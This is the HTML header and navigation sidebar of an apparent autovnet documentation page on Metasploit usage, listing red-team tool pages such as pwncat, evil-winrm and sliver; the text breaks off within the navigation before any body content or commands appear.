
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
        <link rel="canonical" href="https://autovtools.gitlab.io/autovrtfm/usage/pwn/metasploit/">
      
      
        <link rel="prev" href="../winrm/">
      
      
        <link rel="next" href="../merlin/">
      
      
      <link rel="icon" href="../../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.5.3, mkdocs-material-9.4.6">
    
    
      
        <title>metasploit - autovnet</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/main.35e1ed30.min.css">
      
        
        <link rel="stylesheet" href="../../../assets/stylesheets/palette.356b1318.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
      <link rel="stylesheet" href="../../../stylesheets/extra.css">
    
    <script>__md_scope=new URL("../../..",location),__md_hash=e=>[...e].reduce((e,_)=>(e<<5)-e+_.charCodeAt(0),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo">
  
    
    
      <script>var palette=__md_get("__palette");if(palette&&"object"==typeof palette.color)for(var key of Object.keys(palette.color))document.body.setAttribute("data-md-color-"+key,palette.color[key])</script>
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#metasploit" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow md-header--lifted" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="autovnet" class="md-header__button md-logo" aria-label="autovnet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3V6m0 5h18v2H3v-2m0 5h18v2H3v-2Z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            autovnet
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              metasploit
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo"  aria-label="Switch to light mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_2" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 7H7a5 5 0 0 0-5 5 5 5 0 0 0 5 5h10a5 5 0 0 0 5-5 5 5 0 0 0-5-5m0 8a3 3 0 0 1-3-3 3 3 0 0 1 3-3 3 3 0 0 1 3 3 3 3 0 0 1-3 3Z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo"  aria-label="Switch to dark mode"  type="radio" name="__palette" id="__palette_2">
    
      <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 6H7c-3.31 0-6 2.69-6 6s2.69 6 6 6h10c3.31 0 6-2.69 6-6s-2.69-6-6-6zm0 10H7c-2.21 0-4-1.79-4-4s1.79-4 4-4h10c2.21 0 4 1.79 4 4s-1.79 4-4 4zM7 9c-1.66 0-3 1.34-3 3s1.34 3 3 3 3-1.34 3-3-1.34-3-3-3z"/></svg>
      </label>
    
  
</form>
      
    
    
    
      <label class="md-header__button md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.516 6.516 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5Z"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11h12Z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12 19 6.41Z"/></svg>
        </button>
      </nav>
      
        <div class="md-search__suggest" data-md-component="search-suggest"></div>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
      <div class="md-header__source">
        <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.4.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81z"/></svg>
  </div>
  <div class="md-source__repository">
    GitLab
  </div>
</a>
      </div>
    
  </nav>
  
    
      
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../.." class="md-tabs__link">
          
  
  Home

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../rtfm/" class="md-tabs__link">
          
  
  RTFM

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../demo/" class="md-tabs__link">
          
  
  Demo

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../setup/" class="md-tabs__link">
          
  
  Setup

        </a>
      </li>
    
  

      
        
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="../../" class="md-tabs__link">
          
  
  Usage

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../help/" class="md-tabs__link">
          
  
  Reference

        </a>
      </li>
    
  

      
        
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../resources/faq/" class="md-tabs__link">
          
  
  Resources

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
    
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


  

<nav class="md-nav md-nav--primary md-nav--lifted md-nav--integrated" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="autovnet" class="md-nav__button md-logo" aria-label="autovnet" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54Z"/></svg>

    </a>
    autovnet
  </label>
  
    <div class="md-nav__source">
      <a href="https://gitlab.com/autovtools/autovrtfm/autovnet" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 6.4.2 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2023 Fonticons, Inc.--><path d="M439.55 236.05 244 40.45a28.87 28.87 0 0 0-40.81 0l-40.66 40.63 51.52 51.52c27.06-9.14 52.68 16.77 43.39 43.68l49.66 49.66c34.23-11.8 61.18 31 35.47 56.69-26.49 26.49-70.21-2.87-56-37.34L240.22 199v121.85c25.3 12.54 22.26 41.85 9.08 55a34.34 34.34 0 0 1-48.55 0c-17.57-17.6-11.07-46.91 11.25-56v-123c-20.8-8.51-24.6-30.74-18.64-45L142.57 101 8.45 235.14a28.86 28.86 0 0 0 0 40.81l195.61 195.6a28.86 28.86 0 0 0 40.8 0l194.69-194.69a28.86 28.86 0 0 0 0-40.81z"/></svg>
  </div>
  <div class="md-source__repository">
    GitLab
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_1" >
        
          
          <label class="md-nav__link" for="__nav_1" id="__nav_1_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Home
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_1_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_1">
            <span class="md-nav__icon md-icon"></span>
            Home
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../.." class="md-nav__link">
        
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_2" >
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="">
            
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            RTFM
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../rtfm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../rtfm/paradigm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Paradigm
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../rtfm/autovnet/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../rtfm/goals/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Goals
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Demo
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            Demo
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../demo/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Demo
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../demo/proxy/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Proxy
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../demo/callback/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Callback
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_4" >
        
          
          <label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Setup
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_4">
            <span class="md-nav__icon md-icon"></span>
            Setup
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Quick Start
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/network/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Network Design
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/install/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Install
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/configure/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Configure
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../../setup/local/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Local Install
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
    
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" checked>
        
          
          <label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Usage
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_5">
            <span class="md-nav__icon md-icon"></span>
            Usage
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Usage
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_2" >
        
          
          <label class="md-nav__link" for="__nav_5_2" id="__nav_5_2_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    RDN
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_2">
            <span class="md-nav__icon md-icon"></span>
            RDN
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RDN
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/proxy/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Proxy
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/listen/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Listen
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/tun/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Tun
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rdn/dns/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    DNS
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_3" >
        
          
          <label class="md-nav__link" for="__nav_5_3" id="__nav_5_3_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_3">
            <span class="md-nav__icon md-icon"></span>
            RTFM
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rtfm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    RTFM
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rtfm/apt/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    APT
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../rtfm/pasta/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Pasta
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
    
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
        
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5_4" checked>
        
          
          <label class="md-nav__link" for="__nav_5_4" id="__nav_5_4_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Pwn
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_4_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_5_4">
            <span class="md-nav__icon md-icon"></span>
            Pwn
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    pwn
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../share/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    File Hosting
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../pwncat/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    pwncat
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../winrm/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    evil-winrm
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  <span class="md-ellipsis">
    metasploit
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  <span class="md-ellipsis">
    metasploit
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#metasploit-framework-msf" class="md-nav__link">
    Metasploit Framework (msf)
  </a>
  
    <nav class="md-nav" aria-label="Metasploit Framework (msf)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#proxy-msf" class="md-nav__link">
    .proxy-msf
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#msf-reverse" class="md-nav__link">
    msf reverse
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#msf-bind" class="md-nav__link">
    msf bind
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../merlin/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    merlin
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../sliver/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    sliver
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../ligolo_ng/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    ligolo-ng
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_5" >
        
          
          <label class="md-nav__link" for="__nav_5_5" id="__nav_5_5_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Collaboration
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_5_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_5">
            <span class="md-nav__icon md-icon"></span>
            Collaboration
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Collaboration
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/svc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Services
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/fs/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Shared Directories
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/vnc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Screen Sharing
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/hedgedoc/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Shared Notes
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/msfdb/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    msfdb
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/gitea/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    gitea
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/focalboard/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    focalboard
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/drawio/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    drawio
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/cyberchef/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    cyberchef
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/matrix/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    matrix
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/nextcloud/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    nextcloud
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../collaboration/owncast/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    owncast
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
    
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_5_6" >
        
          
          <label class="md-nav__link" for="__nav_5_6" id="__nav_5_6_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Util
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_5_6_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_5_6">
            <span class="md-nav__icon md-icon"></span>
            Util
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../util/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    util
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../util/tmp/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    tmp
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
        <input class="md-nav__toggle md-toggle md-toggle--indeterminate" type="checkbox" id="__nav_6" >
        
          
          <label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="">
            
  
  <span class="md-ellipsis">
    Reference
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_6">
            <span class="md-nav__icon md-icon"></span>
            Reference
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    <li class="md-nav__item">
      <a href="../../help/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    autovnet
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
    
    
    
    
    
      
      
    
    <li class="md-nav__item md-nav__item--section md-nav__item--nested">
      
        
        
        
          
        
